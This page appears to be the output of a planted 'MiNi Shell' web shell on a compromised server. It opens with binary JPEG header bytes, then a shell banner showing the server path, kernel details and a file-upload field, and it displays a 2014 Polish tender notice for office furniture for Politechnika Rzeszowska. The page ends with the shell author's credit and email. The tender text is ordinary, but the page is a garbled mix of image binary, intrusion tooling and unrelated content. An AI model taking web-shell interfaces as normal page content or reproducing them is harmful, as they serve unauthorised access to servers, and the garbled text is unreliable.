JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140609/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140609/124267-N-2014.html

<p class="kh_header"><b>Rzeszów: Dostawa wyposażenia meblowego dla Politechniki Rzeszowskiej</b><br>
<b>Numer ogłoszenia: 124267 - 2014; data zamieszczenia: 09.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Rzeszowska im. Ignacego Łukasiewicza , ul. Powstańców Warszawy 12, 35-959 Rzeszów, woj. podkarpackie, tel. 17 8651250, 8653636, 8653535, faks 17 8651075, 865383.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.prz.rzeszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia meblowego dla Politechniki Rzeszowskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kontener mobilny 4-szufladowy 40x50x65 szt. 4
Szafa ubraniowa 50x60x200 szt. 1
Dostawka półokrągła 120x40x75 na 2 nogach szt. 1
Biurko 140x60x75 szt. 3
Szafka wisząca 120x30x60 szt. 1
Regał 80x38x200 szt. 3
Fotel obrotowy szt. 3
Krzesło szt. 2
Tablica korkowa 100x60 szt. 3;
dostawka do biurek 200x30x94 - 1 szt.,
stolik 80x80x75 - 1 szt.,
pólki do istniejącej szafy 106x71x2,8 - 3 szt.,
szafa aktowa 50x44,5x205 - 1 szt.,
szafka wisząca 125x25x2,8 - 1 szt.,
listwa odbojowa 125x1,8x50 - 1 szt.,
listwa odbojowa 65x1,8x50 - 1 szt.,
listwa odbojowa 133x1,8x50 - 1 szt.,
listwa odbojowa 48,5x1,8x50 - 1 szt.
dostawka 60x25x75 - 1 szt.,
szafka górna 132,5x44,5x77 - 1 szt.,
fronty 80x1,8x180,5 - 1 szt.,
krzesło biurowe - 1 szt.,
fotel obrotowy - 1 szt.;
biurko 130x65x76 - 6 szt.,
regał 75x38x267,5 - 12 szt.,
szafka wisząca 115x38x74 - 6 szt.,
dostawka półokragła 130x40x76 - 3 szt.;
SZAFA UBRANIOWA 70x45x200 SZT. 1
ZABUDOWA POD UMYWALKĘ 120x50x90h szt. 1
KONTENER MOBILNY 4-SZUFLADOWY 45x50x65 SZT. 2
BIURKO PROSTE 160x60x75 szt. 2
DOSTAWKA PÓŁOKRĄGŁA 120x50x75h NA 2 NOGACH szt. 1
DOSTAWKA PRZYŚCIENNA 80x40x75h szt. 2
SZAFKI AKTOWE 160x35x105 szt.1
LUSTRO 60x120x2,2 szt.1
LISTWY ODBOJOWE NA ŚCIANĘ szt. 2
SZAFKA WISZĄCA 120x30x65 h SZT. 1
FOTEL OBROTOWY SZT. 2
KRZESŁO SZT. 2
 WITRYNA 80x35x200 SZT. 2;
Krzesło Biurowe z wyraźnie profilowanym ergonomicznym siedziskiem i oparciem - 9 szt.
Ergonomiczne krzesło biurowe z wyraźnie profilowanym siatkowym oparciem oraz tapicerowanym siedziskiem i synchronicznym (aktywnym) mechanizmem) - 2 szt.
Ergonomiczne krzesło biurowe z profilem siedziska oraz oparcia - 1 szt. ;
Stół warsztatowy - 2 szt.,
Szafa metalowa  - 1 szt.;
SZAFA AKTOWA 80x36x185 - 1 sztuka,
WITRYNA 80x36x185 - 2 sztuki,
SZAFA UBRANIOWA 80x36x185 - 1 sztuka,
SZAFKA ŻALUZJOWA (ZABUDOWA ZLEWOZMYWAKA) Z NADSTAWKĄ - 1 sztuka
KRZESŁO - 3 sztuki;
regał z wysuwaną półką 100x45x220 - 1 szt.,
szafka wisząca otwarta 120x30x74 - 1 szt.,
zabudowa pod zlewozmywak 120x60x90 - 1 szt. + zlewozmywak wpuszczany w blat stal - 1 szt.,
biurko 120x60x75- 1 szt.,
fotel obrotowy - 1 szt.,
stół 220x100x75 - 1 szt.,
krzesło 54,5x42,5x82 - 8 szt.,;
szafa aktowa - 2 szt.,
regał - 2 szt.,
szafa ubraniowa - 2 szt.,
biurko 180x200x75 - 1 szt.,
stolik 70x100x75 - 1 szt.,
krzesło - 6 szt.,
krzesło biurowe-fotel obrotowy - 4 szt.,
krzesło biurowe-fotel obrotowy - 1 szt.,;
biurko 130x65x75 - 2 szt.,
biurko 120x60x75 - 4 szt.,
kontener 45x50x65 - 1 szt.,
pawlacz z regałem 206x55x270 - 1 szt.,
pawlacz 200x55x60 - 1 szt.,
fotel obrotowy - 2 szt.,;
SZAFA AKTOWA 80x36x185 - 8 szt.,                                                          REGAŁ 80x36x185 - 2 szt.,                                                                          SZAFA UBRANIOWA 80x36x185 - 3  szt.,
BIURKO NA KONSTRUKCJI PŁYTOWEJ 140x70x75 - 10 szt.,
KONTENER POD BIURKO - 60x43x50 -10 szt.,
KRZESŁO Iso chrome - 20 szt.,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.11.31.00-8, 39.15.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zadanie nr 1 - 85.00 zł (słownie: osiemdziesiąt pięć  00/100)
Zadanie nr 2 - 115.00 zł (słownie: sto piętnaście  00/100)
Zadanie nr 3 - 290.00 zł (słownie: dwieście dziewięćdziesiąt  00/100)
Zadanie nr 4 - 115.00 zł (słownie: sto piętnaście  00/100)
Zadanie nr 5 - 190.00 zł (słownie: sto dziewięćdziesiąt  00/100)
Zadanie nr 6 - 125.00 zł (słownie: sto dwadzieścia pięć  00/100)
Zadanie nr 7 - 115.00 zł (słownie: sto piętnaście  00/100)
Zadanie nr 8 - 120.00 zł (słownie: sto dwadzieścia  00/100)
Zadanie nr 9 - 240.00 zł (słownie: dwieście czterdzieści  00/100)
Zadanie nr 10 - 120.00 zł (słownie: sto dwadzieścia  00/100)
Zadanie nr 11 - 450.00 zł (słownie: czterysta pięćdziesiąt  00/100)</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty na dostawy - załącznik nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>określone we wzorze umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ogloszenia.propublico.pl/prz<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2014 godzina 10:00, miejsce: w siedzibie Zamawiającego pokój nr 424-1 bud. V al. Powstańców Warszawy 12, 35-959 Rzeszów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wyposażenie meblowe pokoju H-110.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wyposażenie pokoju H - 110:
1. Kontener mobilny 4-szufladowy 40x50x65 szt. 4
2. Szafa ubraniowa 50x60x200 szt. 1
3. Dostawka półokrągła 120x40x75 na 2 nogach szt. 1
4. Biurko 140x60x75 szt. 3
5. Szafka wisząca 120x30x60 szt. 1
6. Regał 80x38x200 szt. 3
7. Fotel obrotowy szt. 3
8. Krzesło szt. 2
9. Tablica korkowa 100x60 szt. 3
Szczegółowy opis zawiera załacznik nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wyposażenie meblowe dla Działu Kształcenia i Katedry Biochemii i Biotechnologii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa:
dostawka do biurek 200x30x94 - 1 szt.,
stolik 80x80x75 - 1 szt.,
pólki do istniejącej szafy 106x71x2,8 - 3 szt.,
szafa aktowa 50x44,5x205 - 1 szt.,
szafka wisząca 125x25x2,8 - 1 szt.,
listwa odbojowa 125x1,8x50 - 1 szt.,
listwa odbojowa 65x1,8x50 - 1 szt.,
listwa odbojowa 133x1,8x50 - 1 szt.,
listwa odbojowa 48,5x1,8x50 - 1 szt.
dostawka 60x25x75 - 1 szt.,
szafka górna 132,5x44,5x77 - 1 szt.,
fronty 80x1,8x180,5 - 1 szt.,
krzesło biurowe - 1 szt.,
fotel obrotowy - 1 szt.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.11.31.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wyposażenie meblowe dla Katedry Konstrukcji Maszyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa:
biurko 130x65x76 - 6 szt.,
regał 75x38x267,5 - 12 szt.,
szafka wisząca 115x38x74 - 6 szt.,
dostawka półokragła 130x40x76 - 3 szt.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wyposażenie meblowe dla Zakładu Oczyszczania i Ochrony Wód.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa:
1. SZAFA UBRANIOWA 70x45x200 SZT. 1
2. ZABUDOWA POD UMYWALKĘ 120x50x90h szt. 1
3. KONTENER MOBILNY 4-SZUFLADOWY 45x50x65 SZT. 2
4. BIURKO PROSTE 160x60x75 szt. 2
5. DOSTAWKA PÓŁOKRĄGŁA 120x50x75h NA 2 NOGACH szt. 1
6. DOSTAWKA PRZYŚCIENNA 80x40x75h szt. 2
7. SZAFKI AKTOWE 160x35x105 szt.1
8. LUSTRO 60x120x2,2 szt.1
9 . LISTWY ODBOJOWE NA ŚCIANĘ szt. 2
10. SZAFKA WISZĄCA 120x30x65 h SZT. 1
11. FOTEL OBROTOWY SZT. 2
12. KRZESŁO SZT. 2
13. WITRYNA 80x35x200 SZT. 2
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wyposażenie meblowe Katedry Konstrukcji Budowlanych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamowienia jest dostawa:
Krzesło Biurowe z wyraźnie profilowanym ergonomicznym siedziskiem i oparciem - 9 szt.
Ergonomiczne krzesło biurowe z wyraźnie profilowanym siatkowym oparciem oraz tapicerowanym siedziskiem i synchronicznym (aktywnym) mechanizmem) - 2 szt.
Ergonomiczne krzesło biurowe z profilem siedziska oraz oparcia - 1 szt. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.11.31.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wyposażenie meblowe Uczelnianego Laboratorium Badań Materiałów dla Przemysłu Lotniczego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamowienia jest dostawa:
Stół warsztatowy - 2 szt.,
Szafa metalowa  - 1 szt.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wyposażenie meblowe dla Katedry Matematyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa:
1.SZAFA AKTOWA 80x36x185 - 1 sztuka,
2.WITRYNA 80x36x185 - 2 sztuki,
3.SZAFA UBRANIOWA 80x36x185 - 1 sztuka,
4.SZAFKA ŻALUZJOWA (ZABUDOWA ZLEWOZMYWAKA) Z NADSTAWKĄ - 1 sztuka
5.KRZESŁO - 3 sztuki
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Wyposażenie meblowe dla Katedry Fizyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa:
regał z wysuwaną półką 100x45x220 - 1 szt.,
szafka wisząca otwarta 120x30x74 - 1 szt.,
zabudowa pod zlewozmywak 120x60x90 - 1 szt. + zlewozmywak wpuszczany w blat stal - 1 szt.,
biurko 120x60x75- 1 szt.,
fotel obrotowy - 1 szt.,
stół 220x100x75 - 1 szt.,
krzesło 54,5x42,5x82 - 8 szt.,
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Wyposażenie meblowe dla Ośrodka Kształcenia Lotniczego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa:
szafa aktowa - 2 szt.,
regał - 2 szt.,
szafa ubraniowa - 2 szt.,
biurko 180x200x75 - 1 szt.,
stolik 70x100x75 - 1 szt.,
krzesło - 6 szt.,
krzesło biurowe-fotel obrotowy - 4 szt.,
krzesło biurowe-fotel obrotowy - 1 szt.,
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Wyposażenie meblowe dla Katedry Technologii Maszyn i Inżynierii Produkcji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa:
biurko 130x65x75 - 2 szt.,
biurko 120x60x75 - 4 szt.,
kontener 45x50x65 - 1 szt.,
pawlacz z regałem 206x55x270 - 1 szt.,
pawlacz 200x55x60 - 1 szt.,
fotel obrotowy - 2 szt.,
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Wyposażenie meblowe dla Katedry Matematyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa:
1.SZAFA AKTOWA 80x36x185 - 8 szt.,
2.REGAŁ 80x36x185 - 2 szt.,  
3.SZAFA UBRANIOWA 80x36x185 - 3  szt.,
4.BIURKO NA KONSTRUKCJI PŁYTOWEJ 140x70x75 - 10 szt.,
5.KONTENER POD BIURKO - 60x43x50 -10 szt.,
6.KRZESŁO Iso chrome - 20 szt., 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com